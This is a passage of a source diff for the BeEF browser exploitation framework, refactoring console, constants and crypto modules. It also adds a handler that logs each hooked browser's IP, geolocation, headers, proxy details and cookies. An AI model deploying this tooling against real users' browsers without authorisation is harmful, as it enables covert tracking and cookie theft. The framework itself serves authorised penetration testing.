-                BeEF::API::Registrar.instance.fire(BeEF::API::Configuration, 'module_configuration_load', y['beef']['module'].keys.first)
-            else
-               print_error "Unable to load module configuration '#{cf}'"
-            end
+        # support nested sub-categories, like browser/hooked_domain/ajax_fingerprint
+        module_configs = File.join("#{$root_dir}/modules/**", "config.yaml")
+        Dir.glob(module_configs) do | cf |
+          y = self.load(cf)
+          if y != nil
+            y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
+            @config = y.deep_merge(@config)
+            # API call for post module config load
+            BeEF::API::Registrar.instance.fire(BeEF::API::Configuration, 'module_configuration_load', y['beef']['module'].keys.first)
+          else
+            print_error "Unable to load module configuration '#{cf}'"
+          end
        end
-    end
+      end

+    end
  end
 end
-end
--- a/extensions/console/banners.rb
+++ b/extensions/console/banners.rb
@@ -1,20 +1,10 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
-module Extension
+module Core
 module Console

 module Banners
@@ -25,8 +15,8 @@ module Banners
    # Prints BeEF's ascii art
    #
    def print_ascii_art
-        if File.exists?('extensions/console/beef.ascii')
-            File.open('extensions/console/beef.ascii', 'r') do |f|
+        if File.exists?('core/main/console/beef.ascii')
+            File.open('core/main/console/beef.ascii', 'r') do |f|
                while line = f.gets
                    puts line 
                end
@@ -40,12 +30,13 @@ module Banners
    def print_welcome_msg
        config = BeEF::Core::Configuration.instance
        version = config.get('beef.version')
-        print_info "Browser Exploitation Framework (BeEF)"
-        data =  "Version #{version}\n"
-        data += "Website http://beefproject.com\n"
-        data += "Run 'beef -h' for basic help.\n"
-        data += "Run 'git pull' to update to the latest revision."
+        print_info "Browser Exploitation Framework (BeEF) #{version}"
+        data = "Twit: @beefproject\n"
+        data += "Site: http://beefproject.com\n"
+        data += "Blog: http://blog.beefproject.com\n"
+        data += "Wiki: https://github.com/beefproject/beef/wiki\n"
        print_more data
+        print_info "Project Creator: " + "Wade Alcorn".red + " (@WadeAlcorn)"
    end

    #
@@ -89,11 +80,13 @@ module Banners

    def print_network_interfaces_routes
      configuration = BeEF::Core::Configuration.instance
+      prototxt = configuration.get("beef.http.https.enable") == true ? "https" : "http"
      
      self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array
        print_success "running on network interface: #{host}"
-        data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
+        data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
        
        print_more data
      end
@@ -104,13 +97,12 @@ module Banners
    #
    def print_loaded_extensions
      extensions = BeEF::Extensions.get_loaded
-      print_info "#{extensions.size} extensions loaded:"
+      print_info "#{extensions.size} extensions enabled."
      output = ''
-      
-      
-      extensions.each do |key,ext|
-        output += "#{ext['name']}\n"
-      end
+
+      #extensions.each do |key,ext|
+      #  output += "#{ext['name']}\n"
+      #end
      
      print_more output
    end
--- a/extensions/console/beef.ascii
+++ b/extensions/console/beef.ascii
--- a/core/main/console/commandline.rb
+++ b/core/main/console/commandline.rb
@@ -0,0 +1,77 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module Console
+      #
+      # This module parses the command line argument when running beef.
+      #
+      module CommandLine
+
+        @options = Hash.new
+        @options[:verbose] = false
+        @options[:resetdb] = false
+        @options[:ascii_art] = false
+        @options[:ext_config] = ""
+        @options[:port] = ""
+        @options[:ws_port] = ""
+        @options[:interactive] = false
+
+
+        @already_parsed = false
+
+        #
+        # Parses the command line arguments of the console.
+        # It also populates the 'options' hash.
+        #
+        def self.parse
+          return @options if @already_parsed
+
+          begin
+            optparse = OptionParser.new do |opts|
+              opts.on('-x', '--reset', 'Reset the database') do
+                @options[:resetdb] = true
+              end
+
+              opts.on('-v', '--verbose', 'Display debug information') do
+                @options[:verbose] = true
+              end
+
+              opts.on('-a', '--ascii_art', 'Prints BeEF ascii art') do
+                @options[:ascii_art] = true
+              end
+
+              opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f|
+                @options[:ext_config] = f
+              end
+
+              opts.on('-p', '--port PORT', 'Change the default BeEF listening port') do |p|
+                @options[:port] = p
+              end
+
+              opts.on('-w', '--wsport WS_PORT', 'Change the default BeEF WebSocket listening port') do |ws_port|
+                @options[:ws_port] = ws_port
+              end
+
+              opts.on('-i', '--interactive', 'Starts with the Console Shell activated') do
+                @options[:interactive] = true
+              end
+            end
+
+            optparse.parse!
+            @already_parsed = true
+            @options
+          rescue OptionParser::InvalidOption => e
+            puts "Invalid command line option provided. Please run beef --help"
+            exit 1
+          end
+        end
+
+      end
+
+    end
+  end
+end
--- a/core/main/constants/browsers.rb
+++ b/core/main/constants/browsers.rb
@@ -1,91 +1,81 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
 module Core
 module Constants
-  
+
  module Browsers

-   	FF      = 'FF'       # Firefox
-   	M       = 'M'        # Mozila
-   	IE      = 'IE'       # Internet Explorer
-   	S       = 'S'        # Safari
-   	K       = 'K'        # Konqueror
-   	C       = 'C'        # Chrome
+    FF      = 'FF'       # Firefox
+    M       = 'M'        # Mozilla
+    IE      = 'IE'       # Internet Explorer
+    S       = 'S'        # Safari
+    K       = 'K'        # Konqueror
+    C       = 'C'        # Chrome
    O       = 'O'        # Opera
-   	ALL     = 'ALL'      # ALL
-   	UNKNOWN = 'UN'       # Unknown
-	
-   	FRIENDLY_FF_NAME  = 'Firefox' 
-   	FRIENDLY_M_NAME   = 'Mozila'
-   	FRIENDLY_IE_NAME  = 'Internet Explorer'
-   	FRIENDLY_S_NAME   = 'Safari'
-   	FRIENDLY_K_NAME   = 'Konqueror'
-   	FRIENDLY_C_NAME   = 'Chrome'
+    ALL     = 'ALL'      # ALL
+    UNKNOWN = 'UN'       # Unknown
+
+    FRIENDLY_FF_NAME  = 'Firefox'
+    FRIENDLY_M_NAME   = 'Mozilla'
+    FRIENDLY_IE_NAME  = 'Internet Explorer'
+    FRIENDLY_S_NAME   = 'Safari'
+    FRIENDLY_K_NAME   = 'Konqueror'
+    FRIENDLY_C_NAME   = 'Chrome'
    FRIENDLY_O_NAME   = 'Opera'
-   	FRIENDLY_UN_NAME  = "UNKNOWN"
- 
-    # Attempt to retrieve a browsers friendly name
+    FRIENDLY_UN_NAME  = 'UNKNOWN'
+
+    # Attempt to retrieve a browser's friendly name
    # @param [String] browser_name Short browser name
    # @return [String] Friendly browser name
-   	def self.friendly_name(browser_name)
-	  
-   	  case browser_name
-   	    when FF;       return FRIENDLY_FF_NAME 
-   	    when M;        return FRIENDLY_M_NAME 	   
-   	    when IE;       return FRIENDLY_IE_NAME   	   
-   	    when S;        return FRIENDLY_S_NAME  	   
-   	    when K;        return FRIENDLY_K_NAME  	   
-        when C;        return FRIENDLY_C_NAME
-        when O;        return FRIENDLY_O_NAME
+    def self.friendly_name(browser_name)
+
+      case browser_name
+        when FF;       return FRIENDLY_FF_NAME
+        when M ;       return FRIENDLY_M_NAME
+        when IE;       return FRIENDLY_IE_NAME
+        when S ;       return FRIENDLY_S_NAME
+        when K ;       return FRIENDLY_K_NAME
+        when C ;       return FRIENDLY_C_NAME
+        when O ;       return FRIENDLY_O_NAME
        when UNKNOWN;  return FRIENDLY_UN_NAME
-   	  end
-	    
-  	end
+      end
+
+    end

    # Attempt to match the browserstring to a browser constant
    # @param [String] browserstring Browser UA string
    # @return [Array] An array of matching browser constants
    # @todo Confirm this function returns an array if multiple constants are matched
-  	def self.match_browser(browserstring)
-  		matches = []
-			browserstring.split(" ").each do |chunk|
-			  case chunk
-			    when /Firefox/ , /FF/
-				    matches << FF
-			    when /Mozilla/
-				    matches << M
-				  when /Internet Explorer/, /IE/
-					  matches << IE
-				  when /Safari/
-			      matches << S
-				  when /Konqueror/
-				    matches << K
-				  when /Chrome/
-				    matches << C
-         when /Opera/
-				    matches << O
-				end
-			end
-			matches.uniq
-	  end
+    def self.match_browser(browserstring)
+      matches = []
+      browserstring.split(" ").each do |chunk|
+        case chunk
+        when /Firefox/, /FF/
+          matches << FF
+        when /Mozilla/
+          matches << M
+        when /Internet Explorer/, /IE/
+          matches << IE
+        when /Safari/
+          matches << S
+        when /Konqueror/
+          matches << K
+        when /Chrome/
+          matches << C
+        when /Opera/
+          matches << O
+        end
+      end
+      matches.uniq
+    end

  end
-  
+
 end
 end
 end
--- a/core/main/constants/commandmodule.rb
+++ b/core/main/constants/commandmodule.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/core/main/constants/distributedengine.rb
+++ b/core/main/constants/distributedengine.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/core/main/constants/hardware.rb
+++ b/core/main/constants/hardware.rb
@@ -0,0 +1,81 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+module BeEF
+module Core
+module Constants
+  
+  # @note The hardware's strings for hardware detection.
+  module Hardware
+
+    HW_UNKNOWN_IMG        = 'pc.png'
+	HW_VM_IMG             = 'vm.png'
+	HW_LAPTOP_IMG         = 'laptop.png'
+	HW_IPHONE_UA_STR      = 'iPhone'
+ 	HW_IPHONE_IMG         = 'iphone.jpg'
+	HW_IPAD_UA_STR	      = 'iPad'
+	HW_IPAD_IMG	          = 'ipad.png'
+	HW_IPOD_UA_STR	      = 'iPod'
+	HW_IPOD_IMG	          = 'ipod.jpg'
+	HW_BLACKBERRY_UA_STR  = 'BlackBerry'
+	HW_BLACKBERRY_IMG     = 'blackberry.png'
+	HW_WINPHONE_UA_STR    = 'Windows Phone'
+	HW_WINPHONE_IMG       = 'win.png'
+    HW_ZUNE_UA_STR        = 'ZuneWP7'
+    HW_ZUNE_IMG           = 'zune.gif'
+	HW_KINDLE_UA_STR      = 'Kindle'
+	HW_KINDLE_IMG         = 'kindle.png'
+	HW_NOKIA_UA_STR       = 'Nokia'
+	HW_NOKIA_IMG          = 'nokia.ico'
+	HW_HTC_UA_STR         = 'HTC'
+	HW_HTC_IMG            = 'htc.ico'
+	HW_MOTOROLA_UA_STR    = 'motorola'
+	HW_MOTOROLA_IMG       = 'motorola.png'
+	HW_GOOGLE_UA_STR      = 'Nexus'
+	HW_GOOGLE_IMG         = 'nexus.png'
+	HW_ERICSSON_UA_STR    = 'Ericsson'
+	HW_ERICSSON_IMG       = 'sony_ericsson.png'
+	HW_ALL_UA_STR         = 'All'
+
+        # Attempt to match operating system string to constant
+        # @param [String] name Name of operating system
+        # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
+		def self.match_hardware(name)
+			case name.downcase
+				when /iphone/
+					HW_IPHONE_UA_STR
+				when /ipad/
+					HW_IPAD_UA_STR
+				when /ipod/
+					HW_IPOD_UA_STR
+				when /blackberry/
+					HW_BLACKBERRY_UA_STR
+				when /windows phone/
+					HW_WINPHONE_UA_STR
+				when /zune/
+					HW_ZUNE_UA_STR
+				when /kindle/
+					HW_KINDLE_UA_STR
+				when /nokia/
+					HW_NOKIA_UA_STR
+				when /motorola/
+					HW_MOTOROLA_UA_STR
+				when /htc/
+					HW_HTC_UA_STR
+				when /google/
+					HW_GOOGLE_UA_STR
+				when /ericsson/
+					HW_ERICSSON_UA_STR
+				else
+					'ALL'
+				end
+		end
+	
+  end
+  
+end
+end
+end
--- a/core/main/constants/os.rb
+++ b/core/main/constants/os.rb
@@ -1,89 +1,78 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
-module Core
-module Constants
-  
-  # @note The OS'es strings for os detection.
-  module Os
-  
-    OS_UNKNOWN_IMG        = 'unknown.png'
-  	OS_WINDOWS_UA_STR     = 'Windows'
-  	OS_WINDOWS_IMG        = 'win.png'
-  	OS_LINUX_UA_STR       = 'Linux'
-  	OS_LINUX_IMG          = 'linux.png'
-  	OS_MAC_UA_STR         = 'Mac'
-  	OS_MAC_IMG            = 'mac.png'
-	OS_QNX_UA_STR	      = 'QNX'
-	OS_QNX_IMG	      = 'qnx.ico'
-	OS_BEOS_UA_STR	      = 'BeOS'
-	OS_BEOS_IMG	      = 'beos.png'
-	OS_OPENBSD_UA_STR     = 'OpenBSD'
-	OS_OPENBSD_IMG	      = 'openbsd.ico'
-	OS_IPHONE_UA_STR      = 'iPhone'
- 	OS_IPHONE_IMG         = 'iphone.png'
-	OS_IPAD_UA_STR	      = 'iPad'
-	OS_IPAD_IMG	      = 'ipad.png'
-	OS_IPOD_UA_STR	      = 'iPod'
-	OS_IPOD_IMG	      = 'ipod.jpg'
-	OS_MAEMO_UA_STR	      = 'Maemo'
-	OS_MAEMO_IMG	      = 'maemo.ico'
-	OS_BLACKBERRY_UA_STR  = 'BlackBerry'
-	OS_BLACKBERRY_IMG     = 'blackberry.png'
-	OS_ANDROID_UA_STR     = 'Android'
-	OS_ANDROID_IMG        = 'android.png'
-    OS_ALL_UA_STR         = 'All'
+  module Core
+    module Constants
+
+      # @note The OS'es strings for os detection.
+      module Os
+
+        OS_UNKNOWN_IMG = 'unknown.png'
+        OS_WINDOWS_UA_STR = 'Windows'
+        OS_WINDOWS_IMG = 'win.png'
+        OS_LINUX_UA_STR = 'Linux'
+        OS_LINUX_IMG = 'linux.png'
+        OS_MAC_UA_STR = 'Mac'
+        OS_MAC_IMG = 'mac.png'
+        OS_QNX_UA_STR = 'QNX'
+        OS_QNX_IMG = 'qnx.ico'
+        OS_BEOS_UA_STR = 'BeOS'
+        OS_BEOS_IMG = 'beos.png'
+        OS_OPENBSD_UA_STR = 'OpenBSD'
+        OS_OPENBSD_IMG = 'openbsd.ico'
+        OS_IOS_UA_STR = 'iOS'
+        OS_IOS_IMG = 'ios.png'
+        OS_IPHONE_UA_STR = 'iPhone'
+        OS_WEBOS_UA_STR = 'webos.png'
+        OS_IPHONE_IMG = 'iphone.jpg'
+        OS_IPAD_UA_STR = 'iPad'
+        OS_IPAD_IMG = 'ipad.png'
+        OS_IPOD_UA_STR = 'iPod'
+        OS_IPOD_IMG = 'ipod.jpg'
+        OS_MAEMO_UA_STR = 'Maemo'
+        OS_MAEMO_IMG = 'maemo.ico'
+        OS_BLACKBERRY_UA_STR = 'BlackBerry'
+        OS_BLACKBERRY_IMG = 'blackberry.png'
+        OS_ANDROID_UA_STR = 'Android'
+        OS_ANDROID_IMG = 'android.png'
+        OS_ALL_UA_STR = 'All'

        # Attempt to match operating system string to constant
        # @param [String] name Name of operating system
        # @return [String] Constant name of matched operating system, returns 'ALL'  if nothing are matched
-		def self.match_os(name)
-			case name.downcase
-				when /win/
-					OS_WINDOWS_UA_STR
-				when /lin/
-					OS_LINUX_UA_STR
-				when /os x/, /osx/, /mac/
-					OS_MAC_UA_STR
-				when /qnx/
-					OS_QNX_UA_STR
-				when /beos/
-					OS_BEOS_UA_STR
-				when /openbsd/
-					OS_OPENBSD_UA_STR
-				when /iphone/
-					OS_IPHONE_UA_STR
-				when /ipad/
-					OS_IPAD_UA_STR
-				when /ipod/
-					OS_IPOD_UA_STR
-				when /maemo/
-					OS_MAEMO_UA_STR
-				when /blackberry/
-					OS_BLACKBERRY_UA_STR
-				when /android/
-					OS_ANDROID_UA_STR
-				else
-					'ALL'
-				end
-		end
-	
+        def self.match_os(name)
+          case name.downcase
+            when /win/
+              OS_WINDOWS_UA_STR
+            when /lin/
+              OS_LINUX_UA_STR
+            when /os x/, /osx/, /mac/
+              OS_MAC_UA_STR
+            when /qnx/
+              OS_QNX_UA_STR
+            when /beos/
+              OS_BEOS_UA_STR
+            when /openbsd/
+              OS_OPENBSD_UA_STR
+            when /ios/, /iphone/, /ipad/, /ipod/
+              OS_IOS_UA_STR
+            when /maemo/
+              OS_MAEMO_UA_STR
+            when /blackberry/
+              OS_BLACKBERRY_UA_STR
+            when /android/
+              OS_ANDROID_UA_STR
+            else
+              'ALL'
+          end
+        end
+
+      end
+
+    end
  end
-  
-end
-end
 end
--- a/core/main/crypto.rb
+++ b/core/main/crypto.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
@@ -36,6 +26,36 @@ module Core
      # return random hex string
      return OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
    end
+
+    # Generate a secure random token, 20 chars, used as an auth token for the RESTful API.
+    # After creation it's stored in the BeEF configuration object => conf.get('beef.api_token')
+    # @return [String] Security token
+    def self.api_token
+      config = BeEF::Core::Configuration.instance
+      token_length = 20
+
+      # return random hex string
+      token = OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
+      config.set('beef.api_token', token)
+      token
+    end
+
+    # Generates a unique identifier for DNS rules.
+    #
+    # @return [String] 8-character hex identifier
+    def self.dns_rule_id
+      id = nil
+      length = 4
+
+      begin
+        id = OpenSSL::Random.random_bytes(length).unpack('H*')[0]
+        BeEF::Core::Models::Dns::Rule.each { |rule| throw StandardError if id == rule.id }
+      rescue StandardError
+        retry
+      end
+
+      id.to_s
+    end
  
  end
 end
--- a/core/main/distributed_engine/models/rules.rb
+++ b/core/main/distributed_engine/models/rules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #

 module BeEF
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -0,0 +1,390 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+module BeEF
+  module Core
+    module Handlers
+      # @note Retrieves information about the browser (type, version, plugins etc.)
+      class BrowserDetails
+
+        @data = {}
+
+        HB = BeEF::Core::Models::HookedBrowser
+        BD = BeEF::Core::Models::BrowserDetails
+
+        def initialize(data)
+          @data = data
+          setup()
+        end
+
+        def err_msg(error)
+          print_error "[Browser Details] #{error}"
+        end
+
+        def setup()
+          print_debug "[INIT] Processing Browser Details..."
+          config = BeEF::Core::Configuration.instance
+
+          # validate hook session value
+          session_id = get_param(@data, 'beefhook')
+          (self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id)
+          hooked_browser = HB.first(:session => session_id)
+          return if not hooked_browser.nil? # browser is already registered with framework
+
+          # create the structure representing the hooked browser
+          zombie = BeEF::Core::Models::HookedBrowser.new(:ip => @data['request'].ip, :session => session_id)
+          zombie.firstseen = Time.new.to_i
+
+          # hostname
+          log_zombie_port = 0
+          if not @data['results']['HostName'].nil? then
+            log_zombie_domain=@data['results']['HostName']
+          elsif (not @data['request'].referer.nil?) and (not @data['request'].referer.empty?)
+            referer = @data['request'].referer
+            if referer.start_with?("https://") then
+              log_zombie_port = 443
+            else
+              log_zombie_port = 80
+            end
+            log_zombie_domain=referer.gsub('http://', '').gsub('https://', '').split('/')[0]
+          else
+            log_zombie_domain="unknown" # Probably local file open
+          end
+
+          # port
+          if not @data['results']['HostPort'].nil? then
+            log_zombie_port=@data['results']['HostPort']
+          else
+            log_zombie_domain_parts=log_zombie_domain.split(':')
+            if log_zombie_domain_parts.length > 1 then
+              log_zombie_port=log_zombie_domain_parts[1].to_i
+            end
+          end
+
+          zombie.domain = log_zombie_domain
+          zombie.port = log_zombie_port
+
+          #Parse http_headers. Unfortunately Rack doesn't provide a util-method to get them :(
+          @http_headers = Hash.new
+          http_header = @data['request'].env.select { |k, v| k.to_s.start_with? 'HTTP_' }
+          .each { |key, value|
+            @http_headers[key.sub(/^HTTP_/, '')] = value
+          }
+          zombie.httpheaders = @http_headers.to_json
+          zombie.save
+          #print_debug "[INIT] HTTP Headers: #{zombie.httpheaders}"
+
+          # add a log entry for the newly hooked browser
+          BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
+          # get and store browser name
+          browser_name = get_param(@data['results'], 'BrowserName')
+          if BeEF::Filters.is_valid_browsername?(browser_name)
+            BD.set(session_id, 'BrowserName', browser_name)
+          else
+            self.err_msg "Invalid browser name returned from the hook browser's initial connection."
+          end
+
+          # lookup zombie host name
+          ip_str = zombie.ip
+          if config.get('beef.dns_hostname_lookup')
+            begin
+              require 'resolv'
+              host_name = Resolv.getname(zombie.ip).to_s
+              if BeEF::Filters.is_valid_hostname?(host_name)
+                ip_str += " [#{host_name}]"
+              end
+            rescue
+              print_debug "[INIT] Reverse lookup failed - No results for IP address '#{zombie.ip}'"
+            end
+          end
+          BD.set(session_id, 'IP', ip_str)
+
+          # geolocation
+          if config.get('beef.geoip.enable')
+            require 'geoip'
+            geoip_file = config.get('beef.geoip.database')
+            if File.exists? geoip_file
+              geoip = GeoIP.new(geoip_file).city(zombie.ip)
+              if geoip.nil?
+                print_debug "[INIT] Geolocation failed - No results for IP address '#{zombie.ip}'"
+              else
+                #print_debug "[INIT] Geolocation results: #{geoip}"
+                BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} is connecting from: #{geoip}", "#{zombie.id}")
+                BD.set(session_id, 'LocationCity', "#{geoip['city_name']}")
+                BD.set(session_id, 'LocationCountry', "#{geoip['country_name']}")
+                BD.set(session_id, 'LocationCountryCode2', "#{geoip['country_code2']}")
+                BD.set(session_id, 'LocationCountryCode3', "#{geoip['country_code3']}")
+                BD.set(session_id, 'LocationContinentCode', "#{geoip['continent_code']}")
+                BD.set(session_id, 'LocationPostCode', "#{geoip['postal_code']}")
+                BD.set(session_id, 'LocationLatitude', "#{geoip['latitude']}")
+                BD.set(session_id, 'LocationLongitude', "#{geoip['longitude']}")
+                BD.set(session_id, 'LocationDMACode', "#{geoip['dma_code']}")
+                BD.set(session_id, 'LocationAreaCode', "#{geoip['area_code']}")
+                BD.set(session_id, 'LocationTimezone', "#{geoip['timezone']}")
+                BD.set(session_id, 'LocationRegionName', "#{geoip['real_region_name']}")
+              end
+            else
+              print_error "[INIT] Geolocation failed - Could not find MaxMind GeoIP database '#{geoip_file}'"
+              print_more "Download: http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz"
+            end
+          end
+
+          # detect browser proxy
+          using_proxy = false
+          [
+              'CLIENT_IP',
+              'FORWARDED_FOR',
+              'FORWARDED',
+              'FORWARDED_FOR_IP',
+              'PROXY_CONNECTION',
+              'PROXY_AUTHENTICATE',
+              'X_FORWARDED',
+              'X_FORWARDED_FOR',
+              'VIA'
+          ].each do |header|
+            unless JSON.parse(zombie.httpheaders)[header].nil?
+              using_proxy = true
+              break
+            end
+          end
+
+          # retrieve proxy client IP
+          proxy_clients = []
+          [
+              'CLIENT_IP',
+              'FORWARDED_FOR',
+              'FORWARDED',
+              'FORWARDED_FOR_IP',
+              'X_FORWARDED',
+              'X_FORWARDED_FOR'
+          ].each do |header|
+            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
+          end
+
+          # retrieve proxy server
+          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+
+          # store and log proxy details
+          if using_proxy == true
+            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
+            proxy_log_string = "#{zombie.ip} is using a proxy"
+            unless proxy_clients.empty?
+              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
+              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
+            end
+            unless proxy_server.nil?
+              BD.set(session_id, 'ProxyServer', "#{proxy_server}")
+              proxy_log_string += " [server: #{proxy_server}]"
+            end
+            BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
+          end
+
+          # get and store browser version
+          browser_version = get_param(@data['results'], 'BrowserVersion')
+          if BeEF::Filters.is_valid_browserversion?(browser_version)
+            BD.set(session_id, 'BrowserVersion', browser_version)
+          else
+            self.err_msg "Invalid browser version returned from the hook browser's initial connection."
+          end
+
+          # get and store browser string
+          browser_string = get_param(@data['results'], 'BrowserReportedName')
+          if BeEF::Filters.is_valid_browserstring?(browser_string)
+            BD.set(session_id, 'BrowserReportedName', browser_string)
+          else
+            self.err_msg "Invalid browser string returned from the hook browser's initial connection."
+          end
+
+          # get and store browser language
+          browser_lang = get_param(@data['results'], 'BrowserLanguage')
+          BD.set(session_id, 'BrowserLanguage', browser_lang)
+
+          # get and store the cookies
+          cookies = get_param(@data['results'], 'Cookies')
+          if BeEF::Filters.is_valid_cookies?(cookies)
+            BD.set(session_id, 'Cookies', cookies)
+          else
+            self.err_msg "Invalid cookies returned from the hook browser's initial connection."
+          end
+
+          # get and store the os name
+          os_name = get_param(@data['results'], 'OsName')
+          if BeEF::Filters.is_valid_osname?(os_name)
+            BD.set(session_id, 'OsName', os_name)
+          else
+            self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
+          end
+
+          # get and store default browser
